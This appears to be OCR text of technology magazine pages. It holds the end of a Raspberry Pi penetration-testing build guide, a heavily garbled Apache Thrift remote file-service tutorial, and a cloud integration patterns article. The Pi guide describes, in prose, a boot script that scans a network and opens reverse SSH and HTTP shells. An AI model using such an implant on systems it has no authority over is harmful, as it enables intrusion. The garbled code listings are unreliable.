(Figure 18). When finished it is installed on 
your hard drive (Figure 19). 


Welcome to the InstalShield Wizard for 
SDformatter 


The InstalShve(R) Wirard wal retal SOF ormatte on your 
computer. To comfrwe, cick Next 


WARNING: Thee orog an « grotected by copyright law and 
mieretorw reates. 


Figure 18. SD Formatter 
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m library © Share with + Burn New folder 


rT. SOFormatter 


Figure 19. Location of SD Formatter 


Format your drive. All of the data 
on the drwe willbe lost when you |. 
format it ay 

SO, SDHC and SDMO Logos are trademarks of 
SD0-30, LLC. 


Orve: (F 3) | 


Retresh 


Size : 148 GB Vobhme Label : TRANSFER 


Format Option | 
QUICK FORMAT, FORMAT SZE ADJUSTMENT OFF 


Figure 20. SD Formatter Launched 


Double click the shortcut and launch the file. A 
simple user interface is launched (Figure 20). 


You will notice in the previous graphic that my 
drive, size, and name of the disk were already 
picked up from before. You can name it any- 
thing you desire, and click format to begin 
erasing the drive. This will not repartition the 
oD Card. If you want to repartition the card 
you will want to use DISKPART. See the fol- 
lowing link to partition a SD Card in Windows 
http://www.winability.com/delete-protected-efi- 


disk-partition/ (Figure 21). 
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out now so you can identify the method you 
will use to install an operating system. 


Formatting ... 


Do not remove the drive during formatting. 
~ Override ERASE OFF 
~ Flash ERASE OFF 
- Format 93% 


since my favorite distribution wants me to use 
the Raspberry Pi Debian version, we. will 
move forward in that direction. 


Cancel 


Linux Distributions — ARM 


Format Option : 
QUICK FORMAT, FORMAT SIZE ADJUSTMENT OFF 


To start, remember that your Raspberry Pi is 
an ARM based computer. This means any- 
thing you use must use ARM architecture. The 
Raspberry Pi Foundation has put together a 
few different distributions ready to image at 


http://downloads.raspberrypi.org (Figure 22). 


Figure 21. Completed SD Format 


Once my format wizard is up and ready, | sim- 


ply clicked Format and my SD Card was for- 
matted and ready to go. Index of / 


Prepare your Pentesting Hard Drive 


Today there are a few small pentesting distri- | one 


butions for the Raspberry Pi. You can choose e2ib 2a 
a few different flavors depending on what you < 


want your Raspberry Pi to do. Or if you are aes 
really adventurous, you can build your own rasebias 
version. After all, building a pentesting system ——— 
is just a matter of creating a Linux workstation pagers 


rsa @ « 
= —_— = al 


and compiling some tools. But some people 
may like pentesting distributions because it 
gets you going quickly. In my review, | will talk 
about Linux distributions for the Raspberry Pi 
and show you how to install my favorite Rasp- 
berry Pi Pentesting Distro. Personally, | have 
a few SD cards with different distributions and Figure 22. Index of http://downloads.raspberrypi.org 
“options” available. | have a special distribu- 
tion that | use for WIFI cracking. | also have a 
special distribution for reconnaissance or 
“phone home’ connectivity. No matter which 
way you want to go, you need to figure this 
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In some cases you can SIMply — 4 heme 
use a distribution from here. Re- 
member, your new Raspberry Pi 
has some interesting connections, including 
that GPIO interface that will need drivers. If 
you do choose to build a hard drive using Red 
Hat Fedora, or some other Linux version, you 
may need to build proper drivers for your hard- 
ware. In this article, we will use the Debian 


version from the Raspberry Pi Foundation. 
DEBIAN version for Raspberry P! 


simply click the Debian link and choose a 
download type you desire. The Wheezy-armel 
version will work great for what we are doing 
(Figure 23). 


Index of /debian 


aL BSS a 


Figure 23. Choosing the download 


My personal download times run at about 7 
minutes for the zip file. | never torrent for 
something so small, and like a good security 
engineer, | am going to download from a 
place | trust and check hashes. When the 
download completes, unzip your image (Fig- 
ure 24). 
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® 2013-05-29-wheezy-armelimg 


Moddied 
5/29/2013 9.22 PM 


Se Ratio Packed 
1.939. 865,600 7S% 4485.9... 


Att 


Type 
IMG File 


Figure 24. Unzipper Wheezy 


Imaging your SD Hard Drive 


Now that you have your Debian Image for 
Raspberry Pi, we can image it to your SD 
Card. The image will only take up 4gb of 
space, so | am glad | have a 16gb card. To im- 
age my SD card, | am going to use WIN- 
DISKIMAGER (Figure 25). 


___ 2013-05-29-wheezy-armel.img 

~ hi 2013-05-29-wheezy-armel.zip 
Changelog. tt 

__ dialhome 

_ GPL-2 

__ LGPL-2.1 

libgcc_s_dw2-l.dil 

libstdc++ -6.dlll 

& mingwmi0.dll 

% QtCored.dill 

®& OtGui.dil 

__ README. tt 

® Win32Diskimager.exe 


“A 
‘S 


Figure 25. Drive with Win32Disklmager and my 
Wheezy image 
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Double click on Win32Disklmager if you have 
it, otherwise, you can get it from source forge 
a ft 
http://sourceforge.net/projects/win32diskima 
er/. Once it opens, select your image file us- 
ing the folder icon, then check that the image 
is going to the right drive, which in my case Is 
the F drive. Once you are ready, click on the 
WRITE button and your SD Card will be im- 
aged (Figure 26). 


Image File 


C:Alsers/erry/Desktop/20 13-05-29 -wheezy-arme.ing 


Progress 


verson: 0.7 
3. 34928MB/s 


Figure 26. Creating a SD Card Image 


This process can take a few minutes depend- 
ing on the speed of your SD Card. Here is a 
brief discussion about a Class 10 vs. Class 4 
oD Cards. A Class 10 card can write at 10mb 
per second which means faster image expand- 
ing. A Class 4 card can read/write at 4mb/s. 
So again, a faster card could give you better 
results. When the write is finished you will get 
a “Done” message. 


Image is done, now what? 


Since we are using Windows, let’s check out 
our SD Card and see what's on it (Figure 27). 


Right away, you will see that the card now reg- 
isters less than the full size of the SD Card. 
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boot (F:) 


3/.5 Ms free of 55.9 MB 


Figure 27. Booting SD car 


| am using a 16gb card but it reads that the F 

drive is 56mb and 37.5 is free. This its be- 
cause the card was reformatted for the im- 
age so there are two partitions on this card. 
One is the Linux boot 56mb drive, and the 
second drive is the remainder of the 4GB 
image. That remainder will be your root par- 
tition once the Raspberry Pi boots up. We 
will expand this 4GB to my full 16GB a little 
later in this demo. 


safely eject your card from the system and 
plug it into your Raspberry Pi. | am going to 
let it boot up and obtain an IP address on 
my network that is running DHCP through the 
Ethernet port. So that means | will need to ca- 
ble up my RJ45 prior to boot. 


Here you can see my Raspberry Pi ready for 
its first boot (Figure 28). 


Figure 28. First Boot 
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As you can see, my Raspberry Pi is running 
RCA video, RJ45 cable, power, and my SD 
Card is put in upside down. It only goes one 
way so you will figure that out. But also note 
that the lights on the Raspberry Pi are all lit. | 
have good power, it has booted, and the NIC 
activity lights are running. IT’S ALIVE! What do 
we see from my TV? (Figure 29) 


When you first SSH into your Raspberry Pi us- 
ing the Wheezy image the username will be 
“pl and the password is “raspberry”. Take a 
quick look around and you will see that it's a 
normal Linux Debian installation. If you per- 
form the command “df you will see you are 
not using your full SD card. You need to ex- 
pand the operating system to fill the full size of 
the SD card if you have a card larger than 
2gb. 


lf you were to view it from the TV, you would 
see a normal Linux style boot up with a Rasp- 
berry Pi logo in the top left; when its done, it (Brews - 
goes right into the Raspberry Pi Software Con- | 
figuration tool (raspi-config). This means it 
booted up correctly and it’s ready to configure. 
But | dont have a keyboard or mouse on 
mine. | need to SSH into my Raspberry Pi. 
since | am in my office network, | can simply 
get the IP from my DHCP logs. If you can't 
identify the DHCP address, then maybe a 
USB keyboard is an option for you (Figure 30). 
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RASPI-CONFIG — Setup your Raspberry Pi 


Now that you are in the console you should 
run “sudo raspi-config’ to configure your Rasp- 
berry Pi. First we will expand the filesystem to 
use all the space on our SD card. Use the ar- 
row keys in your SSH connection to select op- 
tion 1 and expand the file system. When you 
are done, feel free to reboot your Raspberry 
Pi so it can finish expanding the filesystem. 
Here are some other features you may want 
to change: 


° Change User Password: After all, we did 
just publish your username/password. 


° Enable boot to desktop if you are going 
to use this Raspberry Pi as a desktop. 


° Internationalisation Options as neces- 
Sary. 


° Enable Camera? Yes if you buy an Ardu- 
ino connection for GPIO interface. 


° Overclock — yes you can overclock your 
little Raspberry Pi! Use caution there is no 
heat sync. 


° Advanced options — Check them out, 
easy stuff, but there is an update feature 
there! 


° Update if you are inclined. 


Normal Raspberry Pi to Penetration Test- 
ing Raspberry Pi 


At this stage you have a normal Raspberry P! 
using standard Linux Debian. But you dont 
want a regular Raspberry Pi, you want a Pi 
that has cool tools on it. Again, you can start 
here to install Header files and GCC to build 
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your tools; or you could use a Pentest distribu- 
tion. | am going to opt for a distribution so you 
can see how that works. 


There are two core distributions | like for Pene- 
tration Testing. PWNPI from 
http://(www.pwnpi.net has a great distribution 
that has some good tools. However, | really 
love the PWNIE Express distribution that is 
available in both a purchased tool and a com- 
munity version. Since | see many Pentesters 
love Backtrack and Kali, | will opt for PWNIE 
Express in this demo. Its more involved to 
setup than others, but it does bring a bunch of 
great tools including SET, kismet, aircrack, net- 
cat, and a bunch of others ready to go. You 
can get PWNIE Express at 


http://blog.pwnieexpress.com. 
PWNIE Express Installation 


Once you go to the blog site for PWNIE Ex- 
press, you can simply follow the steps for in- 
Stalling GIT and running the install. 


. First do the basics, ping out to confirm 
you have access to the internet from your 
Raspberry Pi and then update APT by running 
an “sudo apt-get update” 


° After this, run “sudo apt-get install git” to 
install GIT. 


° Finally, run the GIT command to get the 
PWNIE Express installer. “git clone 
https://github.com/pwnieexpress/Raspberry-P 


wn.git” (Figure 32) 
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You will see the PWNIE Express installation 
begin updating/installing packages to support 


After the installer is installed simply run the in- the PWNIE Express distribution (Figure 35). 
Stallation command (Figure 33). 


Note that you will need to change directory 
into Raspberry-Pwn that was created in the 
folder you ran the GIT command. | ran my GIT 
command in the home folder for Pi. Once you 
change into the Raspberry-Pwn directory, exe- 
cute the command 
JINSTALL_raspberry_pwn.sh. 


This process will continue until the installation 
is complete. Depending on the speed of your 
internet connection, and class level of the SD 
Card, your install may take some time. My in- 


This command will install the GIT repository _ Stall took half an hour. 
for PWNIE Express (Figure 34). 
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At this stage of the installation you have a 
Raspberry Pi setup ready to perform penetra- 
tion testing. Much like a BackTrack installa- 
tion, many of the testing tools are placed in 
the /pentest folder (Figure 36). AS you can 
see, my 16gb SD Card has 12gb of space re- 
maining on the root partition (Figure 37). And | 
have a lot of free memory to use for the next 
engagement (Figure 38). 


Overall, this new Raspberry Pi is set and 
ready to go. All that needs to be done is turn it 
on and tell it what to do. 


Extending the power of the Raspberry Pi for 
automated attacks 


In my engagements, | have programmed a 
script to do many things. Setup in the 
/etc/init.d folder, my script auto launches on 
boot up and performs recon scanning of an en- 
terprise for my engagement. Then 
it opens up two SSH tunnels, one 
Standard SSH reverse shell and 
another HTTP reverse shell. The 
first thing | do on an engagement 
is turn on my Raspberry Pi and 
let it work. It does a lot of the basic 
Recon work and simple exploita- 
tion. Fully programmable, and 
ready to go, a Raspberry Pi is a 
great tool to use on my penetra- 
tion tests and, with this how-to, 
you can build your own in minimal 
time. 
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Cloud Dervice in a Developer Point 
of View 


by David Carlier 


In this article, we will have an overview of writing a cloud 

service. There exists various ways to achieve your goals but 

we will focus on one which is memory efficient, multiplat- 
form (POSIX systems), multi language (from C++ to Erlang), 

and reasonably fast. It is Apache Thrift. | recently fully wrote 

a cloud service and it worked reliably. 


To illustrate this, we will make a basic remote file handler, the server is written in C++ and the clI- 
ent written in Python as an example. 


Describing the service 


Our server will be able to deliver three different services, listing files or directories, deleting or 
moving a file. Thrift is an IDL (Interface Definition Language) based framework, hence you de- 
scribe your service via an abstract generic language and the Thrift compiler will generate the nec- 
essary code per programming language. The basic Thrift types are all we find in common in all 
languages, byte, binary, integer (116/32/64), double, boolean, string, some containers as hash- 
map, sets or lists. For those familiar with C and or C++ we can define an atomic file with a 
“struct”: 


Sabie ble ws Sealey «i 


1: string name 
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The number means the index of the name's field. A file in a UNIX system can have several types, 
not necessary a regular file but a device, a socket and so forth. So, let's enumerate each type we 
might need to identify the files, again “a la” C/C++ : 


What if we store some file attributes like the size, the permissions bits ... ? Thrift allows to set a 
struct inside a struct without problems as you can see below : 
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Now, we can start to describe the three Thrift “services” as below, for the first we would like to re- 
turn a map of files and for the sake of shortening, we “typedef it as below : 


In addition, for our services we would like to throw an exception in case something went wrong. A 
Thrift exception is nothing but very similar to a struct : 
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lf we do not write the required keyword, a field is then optional. If you re not sure for future devel- 
opment that a field ought to be required, I'd suggest to leave it optional as the clients would stop 
working if the previous required field was suddently optional in the server's side... 


Above all of that we might need to customize the language namespace to organize and avoid con- 
flicts, for Java and C++ developers for example it is pretty well known. The namespace will be 


translated as well in the target language's logic : 


The first will produce the usual C++'s namespace as 


whereas the latter will make the eforensics/cloud Python module. 
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| { 
an‘ 1 a an‘ a 
\o | | | | 
= = a | s = q 


SMiiiiaein nets eum, 
Minas dO 
IB WAL Gae 
SOG aaah 
SYMLINK = 


(eo Crna 


SHES One, a RlhdlicP eels erelbyereom | 
Ahgrtee, Silvey AaB! 
arm ako hn gO LS | 
i116 mask 
164 size 


S iene) ere tiers |< 


Shera Were «ime a 


iRalgliiel. 10h delet MEN aoe 


Bled oy tote legal UNE eek cieia 


string name 


Once the service Is defined, we can now use the thrift compiler like this : 
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// This autogenerated skeleton file illustrates how to build a 


se) Se IE erin 


// You should copy it to another filename to avoid overwriting it. 


#include "file service.h" 

ele guereblolae <i. Gueakieiey  Oncenmevorod!// Jus bievehiany = 1clenmerere dander: 
#include <thrift/server/TSimpleServer.h> 
#include <thrift/transport/TServerSocket.h> 


aaQevaulbiola aac @uank mip feierchencye oa Meiblininsalinasyatcyele: cic. 


namespace :: cea et ea ha 


namespace :: 4 cl gugsbimines, 4 eng@e me rele iy, 


namespace :: Se Cl@uea bic 3 ues ae Crees. 


namespace :: ae QUE TG eS ol any hon Ree 


IQOVOISH EH Sisy ae aiete BASIC IE 


namespace ::eforensics::cloud; 


ous ysrs) (abide y SiSie viel lalsyakelone 4 “syabiaje bie 148 fey) ok ee yam ado. Rel ona abel = bie), 


joule Lake 


JRALJB SE FSS ey abiekS) sloucvoleioae (4 


ANIZVOVW 


oO) 
NR 
— 


Now it is up to us to implement the three services, let's start with the simplest, removing a file with 
the famous C function unlink. 
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To improve it, we could make sure the file is a regular file otherwise return the exception we set 
earlier in the thrift IDL file. 
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ANIZVOVW 


N 
cO 
- 


Cloud 


Ig SU bbO we gue (jereesaueie) Vis eae (3) 
Se leigvemistep se“ CO UUNol eves racemose 
msg += path; 
tev lacaee Het te 
MUSIC hap SNC a Se a @ ie (Wena eae) 4 
Eee SS ERC OCC (tan, 
iE. = FASNSNe. Manse) | (MNSNe |) 


leucine ies 


7 \ am , , , > - 
. | | | a 


aban e duGh. HE iou Oua SNalsyik@ensyiiaiy/< (elonavsie Sioierol = Aisieiadvie\e | San rouaie ps lelej alse, CisHerCl 4 5 syesaak een /aarGrsic,) 


{ 


S610 DONG 75) Brel ee 1S) 
Choa c we welt Serine |e, 


NMONCISR AC. AMNe eae, oSh gas) CUaloe lay, 


Fe (Ci oe VEE Sacer mene) a 
SG a@aligtep aniicvep, 7 Olmdliwe saan bets voc hal Seley manle sere 
ieee eet © OC Cala ule, 
iS = Elo eR ioc )e, 


teelelt a) yma ae 


Then the last service, listing files or directories. Previously, we defined several types of files and 
their attributes, hence we'll once again rely on the stat function : 


184 


MAGAZINE 


ANIZVOVW 


Ke) 
cO 
a 


Cloud 


itedigagrs Bat ASey Mshou eater ch Ole 
1f (m & S IWUSR) 
1 dU rele ess ives |< 
(m & S TRUSR) 
iL eSB Elie 4 ijiers) |< 
(m & S IXUSR) 
iP lbexele Cie yikes! |< 
(m & S IWGRP) 
ML yelelele wie s |< 
(m & S IRGRP) 
1B wie EE 1e yidiveliss |< 
(m & S IXGRP) 


fl.attr.mask 


(m & S TWOTH) 


inelreliC Cle Wiliel ed < 
(m & S TROTH) 
i lbgrte Eee it its s).< OtiGiZ 
(ii cio Ore) 


fl.attr.mask |= OxO0O1; 


@lagshes Sie iaiqqist st |.4.re) ke 
SON eu @He IR AUS laiicls pty Oly ces Pac db arene ia cinch) ah 
iE AGO Iele a Seite ks ,.c, > sO ALIANer SHG Ialitelsy Gir 


return[path] = f1; 


(ss nieiay ead 
DUIRG. RUC ULIG. ha KOS SILO Men Cys Eee Vere he 
Ie ¢ We lig ge ANCES & 
I eNCROMaIGy Semdly 
} 
Struct dirent entry, *result = NULL; 


// We could have just used readdir but might need to run 


// in multi thread context 
i@lak IRR Netevenene bie "el cuba 4's SfSug\ cia iar Scig cvs Obie) 
if (result == NULL) 
IgieSeiicr 
die! AGS EAM Men yy re, Uae onic Piel events), 
SHG OM as Peary sae esi ome Obi @key (ihe), 
COM eine: 
Seis Cages © cle eee Ot, 
Tg -s HIG @ leh By aki Ore eigeatcrlyacw ()P Tata il 
(Oc eM ae / at, 


(MOC Decne Jeers cele atelqitel 


SPS Mec Clee In elegy (qapiac le Walelny mete Oe) Wills) ey 


} 


eulfeysievelkie (iehkie) + 


} 


return O: 


We are nearly done, let's compile the code 


If you execute the final executable, it will listen via the 9090 port and if you generated Python's 
version for example, it should have generated a sample client : 
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SM hy ae lltey Seer ieai ie) cles gh. 15S) 28 lbtey ss a Ihde SCS OM encore oie catiois «IL S2) Aes 


{ '/tmp': file(type=4, attr=file attribute(gid=0, mask=None, uid=0, 
strmask='0777"', size=None), name='/tmp'), 


Pciaiioy AUG dy bhgialye 3 Sse alee ers 4) 2 sence te ie hie joerg ak ower x Kero 10ly. 
mask=None, uid=0, strmask='0777', size=None), name='/tmp/.ICE-unix'), 


Py AB Oye INCI sbiahaly.@// Ie) 4) UF Se aldon GA iol re tellG Sie atl ow Selo 1G eae vl een oper LWOlONG), 
mask=None, uid=1000, strmask='0777', size=None), 
name='/tmp/.ICE-unix/1997'), 


Uy/ eat a el JMeyellie Y Bac se Ie ie ela 0 ehic tc eae ak ee etc ye ask ionbliee (fe akiel Cl eS mle si ee iale 
uid=0, strmask='0222"', size=None), name='/tmp/.X0-lock'), 


Penton oC Lb aebaiiee) oh) 56 a Wen ic iota 7443 sete ote ie a Les celicicae eisuce (ep el —10) 
mask=None, uid=0, strmask='0777', size=None), name='/tmp/.Xll-unix'), 


EY enh Oye CL Bhighatye/ 010) 9 agal WSS eae 9 Velwicse teaboe oleic iesLio baer ((eale Oly 
mask=None, u1id=0, strmask='0777', size=None), 
name='/tmp/.X1l1l-unix/X0'), 


f/f euiney aa a Sep. e ele eb ie alee! re See (leo 7. ele oie ac LIDS ele eae 
bute (gid=1000, mask=None, u1id=1000, strmask='0700', size=None), 
name='/tmp/.vbox-dcarlier-ipc'), 


PU PeMN Oy) eNoioo 4 tole cuie Ini Sneak Oey HE OXCiel 1H, GRE ILENE elo 74 neue lose eS Pele eek 
bute (gid=1000, mask=None, u1id=1000, strmask='0700', size=None), 
name='/tmp/.vbox-dcarlier-ipc/ipcd'), 


FSU ey) e NCle> (ee cte alone il oye! ALerollcl "Gene ie ole 0 yevicne aie seal eiel |e eeal 
bute (gid=1000, mask=None, u1id=1000, strmask='Q0Q600', size=None), 
eS ow e/a Oren Ge eileen Oc /MbOe Kame, 


'/tmp/config-err-tu3hnl': £file(type=0, attr=file attri- 
bute (gid=1000, mask=None, u1id=1000, strmask='Q0Q600', size=None), 
name="'/tmp/config-err-tu3hNl"), 


Pyeuiiey/ wialikie ye tiolsjolencics ieee 40)! Sonat ene acre 10) Sencicje oral I ee eheicienl 
bute (gid=1000, mask=None, u1id=1000, strmask='Q0662', size=None), 
elie / cue wipukie ys erbho@iaie < mesic 0! jr 


We can have a quick look of how the Python's version is made : 


# Pretty straightforward to call each server method as you can see 
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lf we come back to the C++ server's code, the skeleton's generated code uses a TsimpleServer 
which is perfect for start but is monothread. I'd suggest the TThreadPoolServer (more efficient 
than the TThreadedServer) or the TNonBlockingServer instead and to at least add a signal han- 
dler to terminate the server properly. The TthreadPoolServer's version might look like this : 
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Se hale LACS IME JEINME. 9. Neve ent oue leleNavenliea it 
signal (SIGQUIT, servsighandler) ; 


S eC esa oe Get eS One ec sali cin Gl agin 


try i 


S eo Cnr elie shin OCe sc Ole Om O Ces = Oi Me nee Ole etek c em Mil has Cr 
essor(handler) ); 


SUMVeliGi Sie), (Ole a iis Sieve ie lhaareli@ sy Ol 1c Dns Sedeue I igs gsyeveyie CA Ugiey it Ak Sesion Sig) S O10! ea 
Se (jolene ey ie 


Slave epO rm > Mile ais OO lb la CimOlayyaibdee Oo © lew ede @ neil ele ih OS Clee 
ab igeligks|OO ice ever ee) 


S ioiseey Cie Shr GO MOC Ole CwOln) OO woC Olu e wom sieve yal cig re @ les 
Oda e meday/aiele, 


threadManager = 
ThreadManager: :newSimpleThreadManager (workers) ; 


Sloveligel ol sOicte <2 esti y<Il auictcvelelliero Eley Ee ductcre clive @ eee) (iskaNy lees 1d diigi alc 


Hires Onayale)a)e; 
threadManager->threadPactory (threadFactory) ; 


threadManager->start(); 


Sib Gls 6 OC ma SS in, eho is nen er ems Cle Olen, 


Mhevene Viste = ofsleveliGieyel Olea <Al Sioue Voie (ieloiiy UAL ietSyeKell aCe Si oie ViSia (Jone eleiSici= 
SIC 8 = tae Wee Wig eliqua ClO Ig Ca. 16 eeliqlislolone ele ci Clo eA ee eee im ere CO 10) ag, 1 ldiec\cloluile gi 
sKOfeue)) ) * 


Apache Thrift works well indeed in most POSIX systems, I've made the full example server part 
in a Linux machine and tested with FreeBSD and Linux. The client was called on a remote 
FreeBSD's machine. 


There exists an alternative version remade by Facebook called fbothrift which works fully only on 
Linux but the code generated is superior and this version in general has proved to be more effi- 
cient in term of memory usage at least. There also exists Google Protocol Buffer which performs 
better than the two above and has less languages supported (officially). You have to write the cli- 
ent / server code on your own though. So based on your own criterias and restrictions one of 
these might fit better for your own case. 
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Patterns for Cloud Integration 


by Mohamed Farag 


Recent statistics show that 90% of businesses have 
adopted at least one cloud application. 56% of enterprises 
are still identifying IT operations that are candidates for 
cloud hosting [1]. However, recent survey, that was con- 
ducted by IDG Enterprise across 1600 IT decision makers, 
reflects that 46% of survey participants consider cloud inte- 
gration as one of the major disconnects that hold organiza- 
tions from going to the cloud [2]. 


—— — = = — ety _ = = == = 
= ———— pee st ae eS eS =5 — eee a ee Se ee See as a 
= = == —— ee ee — —— — ——  ~_ — eee a ———— 
ss =e) SS Se ao See eee —= cS a = = 
Se _ pes Se = —— = —- ss ae — — => - 


What should you know? What will you learn? 
¢ Good understanding of object oriented ¢ Importance of cloud integration. 
principles. 


¢ Technical considerations in cloud inte- 
¢ Basic understanding of cloud infrastruc- gration. 


ture and cloud technologies. 
¢« Key features of synchronous and asyn- 


¢ Basic knowledge of cloud delivery mod- chronous cloud integration patterns. 
els such as Software-as-a-Service 
(SaaS), Platform-as-a-Service (PaaS), 
and Infrastructure-as-a-Service (laaS). 


— — ——— - = » ——- = — = — — 
= 7 ™ — = — =— zs = eee SOS = = wet = — a a a OC CS eo > we raceeesiat 


a 


a = — = — B= aoe a = ages — ees - - a 
— ee = _ —— -— eee ee es | — —— a — — — — 


Architecture styles evolved significantly in function shareability, distributed computing 
the past decade and opened new doors for and business partner integration. It drove us 
cloud technologies, tools and strategy. Cloud to think about NoSQL databases, SaaS im- 
services enabled new process thinking on provements and data migration strategies. 


data aggregation, data replication, business 
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However, cloud also brought a lot of topics on 
the table. These topics include network la- 
tency, identity management, data security, in- 
teroperability, mobile access levels, applica- 
tion monitoring, application connectivity and 
service Level Agreements (SLAs). Enormous 
research and millions of dollars were invested 
in this area with premises that cloud will pay 
for such costs. In fact, recent statistics reveal 
general trend among IT decision-makers to 
continue the efforts in cloud integration. The 
main driver in this decision is the increasing 
Return on Investments (ROI) along with vast 
improvements in service quality [2]. 


As a result, major software players, such as 
IBM and Microsoft, have realized the impor- 
tance of extending their applications to the 
cloud and they have been offering cloud inte- 
gration as major key feature in extending the 
lifetime of their software. In the same context, 
other software players (For instance, Dell) 
have started the development of cloud-only 


applications due to the cost of cloud integra- . 


tion. This article discusses two major cloud in- 
tegration patterns that can help in reducing 
the cost of such expensive process and pro- 
mote the performance of such applications. 
This discussion focuses on two cloud integra- 
tion patterns; synchronous operation offered 
from Remote Procedure Call (RPC), and Asyn- 
chronous Messaging (AM). Both patterns are 
designed to achieve application-level integrity 
under certain conditions. 


The following section describes each pattern 
individually with respect to its general use, 
pros and cons. There are two types of cloud 
integration that are included in this investiga- 
tion: 
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1. Ground-to-Cloud integration: in 
which the application was developed in non- 
cloud environment and we are trying to adopt 
it to the cloud. 


2. Cloud-to-Cloud integration: in which 
the application targets cloud environment 
only. 


Please note that Cloud-to-Ground integration 
goes beyond the scope of this article. 


Remote Procedure Call (RPC) 


Proxy 
Cloud Application 
Interface 


(Request Initiator/ 
Request Hub) 


Cloud Application 
Content 


Figure 1. RPC Cloud Integration Pattern Representa- 
tion 


This pattern is used to integrate multiple appli- 
cations so that they work together and can ex- 
change information through each application's 
interface [3]. Its useful in information lookup 
to share data among independent applica- 
tions. In addition, this pattern is ultimate solu- 
tion when the data have to live with the 
source in a different area of the network. Fur- 
thermore, the use of application interface pro- 
motes several key concepts such as encapsu- 
lation, abstraction and interoperability. 
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Pros 


1. Provides high reliability since it uses 
point-to-point communication by-default. 


2. Ease of implementation as application in- 
tegration pattern. 


3. Data access at the source level. 


4. Connects different independent applica- 
tions possibly running different technologies. 


Cons 


1. Synchronous operation. In other words, 
caller is blocked until the operation is com- 
pleted. 


2. Lack of uniform security and _ transac- 
tional support. 


3. Not suitable at large-scale cloud environ- 
ments (large distributed environments). 


4. Low Performance. 


9. High level of coupling between services 
since it assumes the availability of existing 
service all the time. 


6. Non-persisted data. 


7. Limited commercial support. 


There are on-going improvements to solve 
the challenges that are introduced by RPC. 
These improvements include the following 
topics: 


1. Security: In this area, identity manage- 
ment can be used to enforce security in the 
communication. 
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2. 


Latency (Performance): There are sev- 
eral tips that can improve the performance 
over the network with respect to security such 
as: 


a. Acquiring authentication tokens 
(e.g. OAuth2). 


b. Callbacks and Caching. 


c. Increased load of messages. In 
other words, avoid sending enormous number 
of small packets over the network. 


3. Transactions: they are not supported by 
this pattern so avoid using them for accept- 
able performance and right behavior. 


4. Commercial Support: maintain com- 


munication to be HTTP oriented. 


Now, how to use the value of this pattern in 
the extension of ground applications to cloud 
environment? 


There are general considerations while 
dealing with RPC patterns in ground-to- 
cloud integrations: 


1. REST-Oriented. 


2. Network Connectivity. 

3. Identity Management. 

4. Service Level Agreements. 
5. Changing Schemas. 
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In order to account for these constraints and 
perform at the maximum level, Figure 2 
shows possible implementation techniques 
that can mitigate significant risks. 


Used as middleware 
to manage the 
extension of ground 
application to the 
cloud 


Enterprise Service 
Bus (ESB), 
integration server 


BizTalk Server, Mule 
ESB, RabbitMQ or 
Tibco ESB Varies 


Enforce point-to- 


Custom Code | | 
point solutions 


Java, .NET, Node.js 


Figure 2. Techniques for Ground-to-Cloud integra- 
tion using RPC pattern 


Well, cloud-to-cloud integration brings more 
consideration to the view. In fact, the consid- 
erations that would make sense itn this context 
are: 


1. Web Services. 
2. Latency. 
3. Service Level Agreements. 


4. Monitoring. 


BizTalk Server, Mule 
ESB, RabbitMQ or 
Tibco ESB 
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Medium 


For this set of considerations, the following 
techniques are available to overcome chal- 
lenges associated with these considerations 
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| Relative 
Techniques Purpose Implementation Example Saad 
| | Basic methodology for making Custom Java or .NET | 
Poin -to-P V 
eve © ere integration not typically RPC Code =o 


On-Premises 
Broker 


Integration bus that is sitting in the 
cloud and managing communication 


Cloud hosted bus 
between cloud endpoints. 


Figure 3. Techniques for Cloud-to-Cloud integration 
using RPC pattern 


The next subsection introduces asynchronous 
messaging integration pattern. 


Asynchronous Messaging (AM) 


Figure 4. AM Cloud Integration Pattern Representa- 
tion 


This pattern uses “Messaging” to transfer 
packets of data frequently, reliably and asyn- 
chronously using customized formats [4]. This 
pattern is extremely useful for data sharing via 
broadcasted messages in which the caller 
does not have to be blocked during operation. 


Basic methodology for making 
integration not typically RPC 


Custom code to build 


broker Medium 


Windows Azure Service 


High 
Bus 'g 


Pros 


1. Callers are not blocked when mak- 
ing calls. 


2. Ideal for broadcasting or multicast- 
ing. 
3. Ideal for cloud-scale. 


4. Can achieve higher 
reliability when brokers are 
used. 


5. Embrace loose cou- 
pling. 


6. Can be used for 
point-to-point or message 
routing to achieve content- 
based routing, message filter- 
ing, recipient list filtering and aggregators. 


7. Can function in stateful or stateless 
modes. 
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Cons 


1. Not real-time synchronization. In 
other words, not consistent enough to man- 
age the communication between modules that 
have some sort of dependency. 


2. Achieving reliability may require 
store + forward which degrade the overall per- 
formance. 


3. Idempotence often needed because 
of the possibility of message duplication. 


4. Broadcasting requires paralleliza- 
tion due to the enormous number of mes- 
sages that are received from peers. 


5. Difficult to debug and trace 


6. Limited commercial application sup- 


port 


Considering these advantages and limita- 
tions, how asynchronous messaging can 
be useful in Ground-to-Cloud integration? 


Asynchronous Messaging is great way to 
limit coupling and module dependencies. How- 
ever, there are few considerations to imple- 
ment this pattern in Ground-to-Cloud integra- 
tion: 


Network Connectivity. 


2. Message Monitoring. 

3. Data Security. 

4. — Interoperability. 

5. Destination System Capabilities. 
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The use of brokers is significant to the per- 
formance and reliability of this pattern. For ex- 
ample, brokers may boost the performance of 
the overall application with asynchronous 
push notifications that will promote caching 
the data that are frequently used. There are 
few techniques that can be used to maximize 
the gain from Asynchronous Messaging given 
Ground-to-Cloud considerations such as 
those stated in Figure 5. 
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Relative 
di hibelnealaiiaie Implement basic asynchronous Mule ESB, BizTalk 
Web Service | Medium 
| operations server or Custom Code 
Operation 
AWS Simpl | 
Good for managing durability : Se Sane Medium 
Service 
, _ Managing complex scenarios Windows Azure Genice a 
penne eater Bus Notification Hubs 'v 


Figure 5. Techniques for Cloud-to-Cloud integration using AM pattern 


IN SUMMARY 


This article introduced two cloud integration patterns that are used to integrate applications. 
These patterns differ in their operational nature although they achieve the same goal. In general, 
Asynchronous Messaging is more convenient for cloud purposes but there is no straight-forward 
answer to the “all-ages” pattern. Instead, an investigation for use cases weighs the need for one 
pattern versus the other. Table 5.0 shows sample use cases for each pattern: 
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z 
~ MeimiFotemers 


_ ar Reliability can be 
Maximize Reliability sisest tic Brcicats 


Not preferred but can 
Transactions be used with cautious 
to idempotency 


AM can be used it it 

switches to point-to- 

point communication 
mode 


Content Based Routing Be +. 
Allowing User action during operation Be + 


Ease of Implementation 
Ease of Debugging and Tracing 


Low Bandwidth Network 
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Hadoop 


How to Deploy a Multi-node Hadoop 
